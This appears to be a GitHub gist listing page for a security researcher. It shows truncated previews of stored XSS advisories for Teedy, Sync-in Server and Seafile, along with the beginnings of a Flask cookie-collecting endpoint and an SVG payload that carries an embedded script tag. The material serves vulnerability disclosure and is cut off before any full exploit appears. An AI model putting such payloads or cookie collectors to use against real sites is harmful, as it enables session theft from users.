x0root
/ Advisory-Teedy.txt
Created
March 7, 2026 01:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Teedy Stored XSS Vulnerability | |
| Vulnerability: Stored Cross-Site Scripting (XSS) in Teedy | |
| Affected Versions: 1.11 (latest) | |
| Fixed Version: None (unpatched) | |
| Reported Date: 12/07/2025 | |
| Researcher: x0root | |
| Technical Details |
x0root
/ Advisory.txt
Last active
February 1, 2026 05:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sync-in stored XSS vulnerability | |
| Vulnerability: Stored Cross-Site Scripting (XSS) in Sync-in Server | |
| Affected Versions: < 1.9.3 | |
| Fixed Version: 1.9.3 | |
| Reported Date: 12/06/2025 | |
| Researcher: x0root | |
| Technical Details |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, request, jsonify | |
| app = Flask(__name__) | |
| @app.route("/cookie-test", methods=["GET", "POST"]) | |
| def cookie_test(): | |
| found = [] | |
| # 1. Normal HTTP cookies (Cookie header parsed by Flask) | |
| if request.cookies: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from IPython.display import HTML, display | |
| svg_payload = """ | |
| <svg xmlns="http://www.w3.org/2000/svg" width="500" height="200"> | |
| <rect width="100%" height="100%" fill="black"/> | |
| <text x="20" y="40" fill="lime" font-size="16"> | |
| SVG XSS via IPython | |
| </text> | |
| <script> |
x0root
/ gist:a260d9affd04de02d153a02697fafba9
Created
December 27, 2025 02:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from IPython.display import HTML, display | |
| svg_payload = """ | |
| <svg xmlns="http://www.w3.org/2000/svg" width="500" height="200"> | |
| <rect width="100%" height="100%" fill="black"/> | |
| <text x="20" y="40" fill="lime" font-size="16"> | |
| SVG XSS via IPython | |
| </text> | |
| <script> |
x0root
/ gist:10ceb91f4753acca630cc12e422858bb
Created
December 27, 2025 02:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask, make_response | |
| app = Flask(__name__) | |
| @app.route("/") | |
| def index(): | |
| html = """ | |
| <!DOCTYPE html> | |
| <html> | |
| <head> |
x0root
/ Advisory.txt
Last active
December 2, 2025 23:10
CVE-2025-65516 — Seafile Stored XSS (SVG upload leads to arbitrary JavaScript execution in Golang file server)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2025-65516 — Seafile Stored XSS | |
| [Suggested Description]: | |
| A stored cross-site scripting (XSS) vulnerability exists in Seafile Community Edition when using the Golang file server. A crafted SVG file containing malicious JavaScript can be uploaded and accessed through a public sharing link, resulting in script execution in the victim’s browser. | |
| [Vulnerability Type]: Cross Site Scripting (XSS) | |
| [Affected Versions]: | |
| Seafile Community Edition — all versions below 13.0.12 |